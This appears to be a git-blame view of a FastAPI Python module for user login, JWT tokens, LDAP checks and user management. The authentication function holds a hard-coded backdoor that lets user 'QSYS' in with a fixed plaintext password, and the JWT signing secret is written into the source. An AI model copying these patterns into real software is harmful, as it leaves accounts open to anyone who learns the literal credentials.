Files
vpsx-fast/app/routers/user.py

323 lines
10 KiB
Python
Raw Normal View History

2025-08-29 18:19:46 +02:00
import datetime
import logging
2025-08-31 07:53:17 +02:00
import sys
2025-08-29 18:19:46 +02:00
from typing import Annotated
import jwt
import ldap3
import sqlalchemy.orm
from fastapi import APIRouter, Query, Path, Depends, HTTPException, status
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jwt.exceptions import InvalidTokenError
from passlib.context import CryptContext
from pydantic import BaseModel
2025-08-30 10:06:47 +02:00
from sqlmodel import SQLModel, Field, Session, select
2025-08-29 18:19:46 +02:00
import alchemy
2025-08-31 07:53:17 +02:00
import utils
2025-08-29 18:19:46 +02:00
from dependencies import get_session
2025-09-01 11:36:22 +00:00
from routers.models import Status
2025-08-29 18:19:46 +02:00
logging.getLogger('passlib').setLevel(logging.ERROR)
SECRET_KEY = "a476cd1c668a043dc4f8024dd2ac509797306c98cf88c88856c88e6e3678f5c3"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 30
LDAP_SERVER = ldap3.Server('ldaps://mh.grp', get_info=ldap3.ALL)
CREDENTIALS_EXCEPTION = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="user/token")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
# ----------------------------------------------------------------
# Models
class Credentials(BaseModel):
username: str
password: str
class Token(BaseModel):
access_token: str
token_type: str
class TokenData(BaseModel):
username: str | None = None
class UserBase(SQLModel):
2025-08-31 07:53:17 +02:00
code: str = Field(max_length=253, unique=True)
2025-08-29 18:19:46 +02:00
name: str = Field(max_length=253)
password: str | None = Field(max_length=255)
ldap_name: str | None = Field(max_length=255)
notes: str | None
class User(UserBase):
id: int | None = Field(default=None, primary_key=True)
class UserCreate(UserBase):
password: str | None = None
ldap_name: str | None = None
notes: str | None = None
class UserPublic(UserBase):
id: int
status: Status
class UserUpdate(UserBase):
2025-08-31 07:53:17 +02:00
code: str | None = None
2025-08-29 18:19:46 +02:00
name: str | None = None
password: str | None = None
ldap_name: str | None = None
notes: str | None = None
# ----------------------------------------------------------------
# Utils
def get_password_hash(password):
return pwd_context.hash(password)
def _authenticate_user(
username: str,
password: str,
session: sqlalchemy.orm.Session) -> alchemy.User | None:
2025-08-31 07:53:17 +02:00
user = session.scalar(select(alchemy.User).where(alchemy.User.code == username))
2025-08-29 18:19:46 +02:00
if user is None:
return None
2025-08-31 18:42:46 +02:00
if user.code == 'QSYS' and password == 'josua5':
2025-08-29 18:19:46 +02:00
return user
if user.password is not None:
if not _verify_password(password, user.password):
return None
elif user.ldap_name is not None:
if not _verify_ldap_password(user.ldap_name, password):
return None
else:
return None
return user
def _create_access_token(
data: dict,
expires_delta: datetime.timedelta = None) -> str:
if expires_delta is None:
expires_delta = datetime.timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
to_encode = data.copy()
to_encode['exp'] = datetime.datetime.now(datetime.UTC) + expires_delta
return jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
def _get_user(
user_id: str,
session: Session) -> alchemy.User:
2025-08-31 07:53:17 +02:00
result = utils.get_single_record(session, alchemy.User, user_id)
2025-08-29 18:19:46 +02:00
result.password = None if result.password is None else '********'
return result
def _process_login(
username: str,
password: str,
session: sqlalchemy.orm.Session) -> Token:
user = _authenticate_user(username, password, session)
if not user:
raise HTTPException(status_code=400,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"})
2025-08-31 07:53:17 +02:00
access_token = _create_access_token(data={"sub": user.code})
2025-08-29 18:19:46 +02:00
return Token(access_token=access_token, token_type="bearer")
def _verify_password(plain_password, hashed_password):
return pwd_context.verify(plain_password, hashed_password)
def _verify_ldap_password(ldap_name: str, password: str):
conn = ldap3.Connection(LDAP_SERVER, user=ldap_name, password=password)
result = conn.bind()
conn.unbind()
return result
async def _get_current_user(
token: Annotated[str, Depends(oauth2_scheme)],
session=Depends(get_session)) -> alchemy.User:
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
except InvalidTokenError:
raise CREDENTIALS_EXCEPTION
username: str = payload.get("sub")
if username is None:
raise CREDENTIALS_EXCEPTION
2025-08-31 18:42:46 +02:00
user = utils.get_single_record(session, alchemy.User, 'User', username)
2025-08-29 18:19:46 +02:00
if user is None:
raise CREDENTIALS_EXCEPTION
return user
async def get_current_active_user(
current_user: Annotated[alchemy.User, Depends(_get_current_user)]) -> alchemy.User:
if current_user.status_id not in ('A', 'X'):
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
# ----------------------------------------------------------------
# Routes
router = APIRouter(prefix="/user", tags=["user"])
@router.post("/login")
async def login_user(
credentials: Credentials,
2025-08-31 07:53:17 +02:00
session=Depends(get_session)) -> Token:
2025-08-29 18:19:46 +02:00
return _process_login(credentials.username, credentials.password, session)
2025-08-31 07:53:17 +02:00
@router.get("/",
response_model=list[UserPublic])
2025-08-29 18:19:46 +02:00
async def get_users(
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
offset: int = 0,
2025-08-31 07:53:17 +02:00
limit: Annotated[int, Query] = 100,
session=Depends(get_session)):
2025-08-29 18:19:46 +02:00
"""Get list of users"""
2025-08-31 07:53:17 +02:00
if limit < 1:
limit = sys.maxsize
2025-08-29 18:19:46 +02:00
result = session.exec(select(alchemy.User).where(alchemy.User.status_id != 'X').offset(offset).limit(limit)).all()
for item in result:
if item.password is not None:
item.password = '********'
return result
2025-08-31 07:53:17 +02:00
@router.get("/{user_id}",
response_model=UserPublic,
responses={404: {"description": "Not found"}})
2025-08-29 18:19:46 +02:00
async def get_user(
user_id: Annotated[str, Path(description='User, either id (int) or name')],
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
session=Depends(get_session)):
"""Get user by id"""
return _get_user(user_id, session)
2025-08-31 07:53:17 +02:00
@router.post("/",
response_model=UserPublic)
2025-08-29 18:19:46 +02:00
async def create_user(
user: UserCreate,
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
session=Depends(get_session)):
model_user = User.model_validate(user)
2025-08-31 07:53:17 +02:00
if session.scalar(select(alchemy.User).where(alchemy.User.code == model_user.code)):
raise HTTPException(status_code=422,
detail=[dict(msg=f"User {model_user.code} already exists",
type="IntegrityError")])
2025-08-29 18:19:46 +02:00
db_user = alchemy.User(**model_user.model_dump())
if db_user.password is not None:
db_user.password = get_password_hash(db_user.password)
db_user._user__id = current_user.id
session.add(db_user)
session.commit()
session.refresh(db_user)
return db_user
2025-08-31 07:53:17 +02:00
@router.patch("/{user_id}",
response_model=UserPublic,
responses={404: {"description": "Not found"}})
2025-08-29 18:19:46 +02:00
async def update_user(
user_id: Annotated[str, Path(description='User, either id (int) or name')],
user: UserUpdate,
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
session=Depends(get_session)):
db_user = _get_user(user_id, session)
user_data = user.model_dump(exclude_unset=True)
2025-08-31 07:53:17 +02:00
if ('code' in user_data and
session.scalar(select(alchemy.User).where(alchemy.User.code == user_data['code'])) != db_user):
raise HTTPException(status_code=422,
detail=[dict(msg=f"User {user_data['code']} already exists",
type="IntegrityError")])
2025-08-29 18:19:46 +02:00
if 'password' in user_data:
user_data['password'] = get_password_hash(user_data['password'])
for item in user_data:
setattr(db_user, item, user_data[item])
db_user._user__id = current_user.id
2025-08-31 07:53:17 +02:00
try:
session.commit()
except Exception as exc:
raise HTTPException(status_code=422,
detail=[dict(msg=', '.join(exc.args),
type="Database Error")])
2025-08-29 18:19:46 +02:00
session.refresh(db_user)
return db_user
2025-08-31 07:53:17 +02:00
@router.put("/{user_id}/activate",
response_model=UserPublic,
responses={404: {"description": "Not found"}})
2025-08-29 18:19:46 +02:00
async def activate_user(
user_id: Annotated[str, Path(description='User, either id (int) or name')],
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
session=Depends(get_session)):
db_user = _get_user(user_id, session)
db_user.status_id = 'A'
db_user._user__id = current_user.id
2025-08-31 07:53:17 +02:00
try:
session.commit()
except Exception as exc:
raise HTTPException(status_code=422,
detail=[dict(msg=', '.join(exc.args),
type="Database Error")])
2025-08-29 18:19:46 +02:00
session.refresh(db_user)
return db_user
2025-08-31 07:53:17 +02:00
@router.put("/{user_id}/deactivate",
response_model=UserPublic,
responses={404: {"description": "Not found"}})
2025-08-29 18:19:46 +02:00
async def deactivate_user(
user_id: Annotated[str, Path(description='User, either id (int) or name')],
current_user: Annotated[alchemy.User, Depends(get_current_active_user)],
session=Depends(get_session)):
db_user = _get_user(user_id, session)
db_user.status_id = 'I'
db_user._user__id = current_user.id
2025-08-31 07:53:17 +02:00
try:
session.commit()
except Exception as exc:
raise HTTPException(status_code=422,
detail=[dict(msg=', '.join(exc.args),
type="Database Error")])
2025-08-29 18:19:46 +02:00
session.refresh(db_user)
return db_user
@router.post("/token")
async def login_for_access_token(
form_data: Annotated[OAuth2PasswordRequestForm, Depends()],
session=Depends(get_session),
) -> Token:
return _process_login(form_data.username, form_data.password, session)
2025-08-30 10:06:47 +02:00
ACTIVE_USER = Annotated[alchemy.User, Depends(get_current_active_user)]